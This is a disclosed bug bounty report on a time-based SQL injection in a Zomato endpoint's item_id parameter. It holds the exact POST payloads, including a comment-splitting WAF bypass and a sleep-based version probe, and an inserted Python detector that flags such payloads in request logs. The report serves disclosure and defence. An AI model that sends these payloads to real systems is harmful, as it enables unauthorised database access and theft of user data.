[www.zomato.com] SQLi - /php/██████████ - item_id
State Resolved (Closed)
Disclosed publicly 2018-09-11T05:04:45.002Z
Reported To Zomato
Weakness SQL Injection
Bounty $2,000
Summary by gerben_javado

Thanks to the entire @Zomato team for doing this challenge. It's a pleasure to be back in the bug bounty game after a while.

Introduction

So I managed to find SQLi on https://www.zomato.com/php/██████████ in the POST parameter item_id. Debugging and exploiting this issue was somewhat confusing in the beginning because there seems to be database caching going on based on the int value that is given. So, for example, when you submit item_id=1111-stuffthatchangeshere multiple times, the payload won't work anymore. In order to circumvent this caching you need to increment or decrement the integer before the payload on every request.

Exploitation

I started off simple to really understand that we were dealing with a SQLi. The sleep command was the way for me to prove this, and this worked quite easily using my previously discovered Akamai Kona Bypass:

POST https://www.zomato.com/php/██████████
Body: res_id=1111&method=add_menu_item_tags&item_id=1111-sleep/*f*/(10)&new_tags[]=3&menu_id=1111

From there I wanted to prove data extraction and came up with the following POC:

POST https://www.zomato.com/php/██████████
res_id=1111&method=add_menu_item_tags&item_id=1111-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111

Response time: 6090ms

POST https://www.zomato.com/php/██████████
res_id=1111&method=add_menu_item_tags&item_id=1111-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111

Response time: 910ms

This proves that version() starts with a 5 and shows that we can extract data out of the database. At this point I stopped testing to write the report. Good luck fixing.
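As an added example, not code from the report or from Zomato, the Python below shows what a defender can do with the two observations above: the `/*f*/` splitting is only a problem for a signature that matches the raw parameter, so MySQL inline comments are stripped before matching; and an id that is not a plain integer is a finding on its own, independent of any payload signature. The log entries in SAMPLE_LOG, the parameter name, and the 4000 ms threshold are constructed assumptions for the demonstration; it assumes a log source that records each request's raw form body and server-side response time.

```python
"""Detect time-based SQL injection attempts in captured POST bodies.

Added example for this report, not code from the report or from Zomato.
It assumes a log source that records each request's raw form body and
server-side response time; SAMPLE_LOG is constructed here to mirror the
shape of the payloads in the report.
"""
import re
from urllib.parse import parse_qs

# Constructed sample log: (form body, response time in ms). The first two
# entries are ordinary traffic; the last three mirror the report's payloads.
SAMPLE_LOG = [
    ("res_id=1111&method=add_menu_item_tags&item_id=1111&new_tags%5B%5D=3&menu_id=1111", 120),
    ("res_id=1111&method=add_menu_item_tags&item_id=1112&new_tags%5B%5D=3&menu_id=1111", 95),
    ("res_id=1111&method=add_menu_item_tags&item_id=1111-sleep/*f*/(10)&new_tags%5B%5D=3&menu_id=1111", 10090),
    ("res_id=1111&method=add_menu_item_tags&item_id=1112-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111", 6090),
    ("res_id=1111&method=add_menu_item_tags&item_id=1113-if(mid(version/*f*/(),1,1)=4,sleep/*f*/(5),0)&new_tags%5B%5D=3&menu_id=1111", 910),
]

# MySQL treats /* ... */ as a comment, so "sleep/*f*/(10)" executes as "sleep(10)".
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# The usual MySQL timing primitives, matched only after comments are stripped.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def normalize_sql_value(value: str) -> str:
    """Strip inline comments so the obfuscated and plain forms compare equal."""
    return INLINE_COMMENT.sub("", value)


def param_value(body: str, name: str) -> str:
    """First value of a form parameter, or '' when it is absent."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def analyze_request(body, response_ms, param="item_id", slow_ms=4000):
    """Return the reasons a request looks like time-based SQLi; [] if clean.

    Three independent signals: the id is not a plain integer (what a
    validating handler would reject outright), the normalized value calls
    a timing function, and the response exceeded slow_ms (assumed threshold).
    """
    raw = param_value(body, param)
    reasons = []
    if not raw.isdigit():
        reasons.append("non_integer_id")
    if TIME_FUNCS.search(normalize_sql_value(raw)):
        reasons.append("timing_function")
    if response_ms >= slow_ms:
        reasons.append("slow_response")
    return reasons


def analyze_log(log, **kwargs):
    """Map log index -> reasons for every request that raised a signal."""
    findings = {}
    for i, (body, ms) in enumerate(log):
        reasons = analyze_request(body, ms, **kwargs)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in analyze_log(SAMPLE_LOG).items():
        print(f"request {idx}: {', '.join(reasons)}")
```

Timing on its own is a noisy signal: the false branch of the version check in the report came back in 910 ms, well under any sensible threshold, yet it is the same attack. The integer check is the one that catches every variant, and it is also the shape of the fix on the application side: an id parameter that is cast to an integer or bound through a prepared statement never reaches the query as SQL text.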

Impact

Full database access holding private user information.

Summary by gerben_javado

Thanks @gerben_javado for helping us keep @zomato secure :)

Timeline
submitted a report to Zomato. 2018-08-31T19:50:43.729Z

Regards,
Frans

shreysinha Activities::Comment 2018-08-31T19:56:49.844Z
prateek_0490-zomato Activities::Comment 2018-09-01T00:02:39.259Z
prateek_0490-zomato Activities::BugTriaged 2018-09-01T00:02:50.227Z
gerben_javado Activities::Comment 2018-09-01T00:07:27.769Z
gerben_javado Activities::Comment 2018-09-01T00:08:00.496Z
gerben_javado Activities::Comment 2018-09-01T00:20:07.001Z
gerben_javado Activities::Comment 2018-09-01T00:23:20.678Z
gerben_javado Activities::Comment 2018-09-01T00:32:57.106Z
prateek_0490-zomato Activities::Comment 2018-09-01T00:35:26.824Z
gerben_javado Activities::Comment 2018-09-01T00:37:19.405Z
prateek_0490-zomato Activities::Comment 2018-09-01T00:41:19.298Z
gerben_javado Activities::Comment 2018-09-01T00:42:50.686Z
prateek_0490-zomato Activities::BugResolved 2018-09-01T08:46:40.783Z
Activities::BountyAwarded 2018-09-02T07:49:55.720Z
gerben_javado Activities::AgreedOnGoingPublic 2018-09-08T12:00:32.423Z
prateek_0490-zomato Activities::Comment 2018-09-08T15:02:02.819Z
gerben_javado Activities::Comment 2018-09-08T15:20:41.570Z
gerben_javado Activities::Comment 2018-09-10T14:58:19.414Z
prateek_0490-zomato Activities::Comment 2018-09-10T16:15:03.876Z
prateek_0490-zomato Activities::AgreedOnGoingPublic 2018-09-11T05:04:44.903Z
prateek_0490-zomato Activities::ReportBecamePublic 2018-09-11T05:04:45.035Z